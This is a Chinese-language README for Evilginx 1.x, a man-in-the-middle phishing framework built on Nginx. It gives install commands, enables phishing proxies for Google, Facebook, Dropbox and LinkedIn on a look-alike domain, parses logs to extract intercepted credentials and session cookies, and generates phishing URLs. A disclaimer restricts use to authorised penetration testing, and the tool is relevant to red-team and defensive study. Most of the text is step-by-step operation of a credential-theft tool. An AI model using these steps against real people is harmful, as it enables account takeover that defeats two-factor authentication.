
此版本已过时。请使用最新版本!
EVILGINX 2: https://github.com/kgretzky/evilginx2
Evilginx 是一个中间人攻击框架,用于窃取任意网络服务的登录凭证和会话 Cookie。其核心运行在 Nginx HTTP 服务器上,利用 proxy_pass 和 sub_filter 来代理和修改 HTTP 内容,同时拦截客户端与服务器之间的流量。
你可以在我博客上了解它的工作原理以及如何自行安装:
第一篇文章现已稍有过时:Evilginx - 带双因素认证绕过的高级钓鱼攻击
Evilginx 1.0 更新:Evilginx 1.0 更新 - 提升你的 2FA 钓鱼水平
Evilginx 1.1 更新:Evilginx 1.1 更新
我知道 Evilginx 可能被用于非常邪恶的目的。这项工作仅仅是对熟练攻击者能力的演示。防御者有责任在设置防御措施时考虑这类攻击,并找到保护自己免受这种钓鱼方法侵害的方法。 Evilginx 只应在合法的渗透测试任务中使用,且需获得被钓鱼方的书面许可。
Evilginx 提供了一个安装脚本 install.sh,可以以“即发即忘”的方式在任何 Debian wheezy/jessie 机器上安装整个软件包。
git clone https://github.com/kgretzky/evilginx
cd evilginx
chmod 700 install.sh
./install.sh
_ _ _
(_) | (_)
_____ ___| | __ _ _ _ __ __ __
/ _ \ \ / / | |/ _` | | '_ \\ \/ /
| __/\ V /| | | (_| | | | | |> <
\___| \_/ |_|_|\__, |_|_| |_/_/\_\
__/ |
by @mrgretzky |___/ v1.0
usage: evilginx.py [-h] {setup,parse,genurl} ...
positional arguments:
{setup,parse,genurl}
setup 配置 Evilginx。
parse 解析日志文件。
genurl 生成钓鱼 URL。
optional arguments:
-h, --help 显示此帮助信息并退出
启用或禁用站点配置以用于 Nginx 服务器,使用提供的 sites 目录中的 Evilginx 模板。
usage: evilginx.py setup [-h] [-d DOMAIN] [-y]
(-l | --enable ENABLE | --disable DISABLE)
optional arguments:
-h, --help 显示此帮助信息并退出
-d DOMAIN, --domain DOMAIN
你的钓鱼域名。
-y 对所有问题回答“是”。
-l, --list 列出可用的受支持应用。
--enable ENABLE 按名称启用以下站点。
--disable DISABLE 按名称禁用以下站点。
列出可用的站点配置模板:
python evilginx.py setup -l
Listing available supported sites:
- dropbox (/root/evilginx/sites/dropbox/config)
subdomains: www
- google (/root/evilginx/sites/google/config)
subdomains: accounts, ssl
- facebook (/root/evilginx/sites/facebook/config)
subdomains: www, m
- linkedin (/root/evilginx/sites/linkedin/config)
subdomains: www
使用预注册的钓鱼域名 not-really-google.com 启用谷歌钓鱼站点:
python evilginx.py setup --enable google -d not-really-google.com
禁用 Facebook 钓鱼站点:
python evilginx.py setup --disable facebook
解析 Nginx 日志以提取拦截到的登录凭证和会话 Cookie。日志默认保存在 evilginx.py 脚本所在的 logs 目录中。
在设置阶段启用自动解析后,可以自动完成此操作。
usage: evilginx.py parse [-h] -s SITE [--debug]
optional arguments:
-h, --help 显示此帮助信息并退出
-s SITE, --site SITE 要解析日志的站点名称('all' 表示解析所有站点的日志)。
--debug 解析后不截断日志文件。
仅解析谷歌站点的日志:
python evilginx.py parse -s google
解析所有可用站点的日志:
python evilginx.py parse -s all
生成可在红队评估中使用的钓鱼 URL。
usage: evilginx.py genurl [-h] -s SITE -r REDIRECT
optional arguments:
-h, --help 显示此帮助信息并退出
-s SITE, --site SITE 要生成链接的站点名称。
-r REDIRECT, --redirect REDIRECT
成功登录后将用户重定向到该 URL。
生成一个谷歌钓鱼 URL,成功登录后将受害者重定向到 Rick Astley 的“Never Gonna Give You Up”视频:
python evilginx.py genurl -s google -r https://www.youtube.com/watch?v=dQw4w9WgXcQ
Generated following phishing URLs:
: https://accounts.not-really-google.com/ServiceLogin?rc=0aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g_dj1kUXc0dzlXZ1hjUQ
: https://accounts.not-really-google.com/signin/v2/identifier?rc=0aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g_dj1kUXc0dzlXZ1hjUQ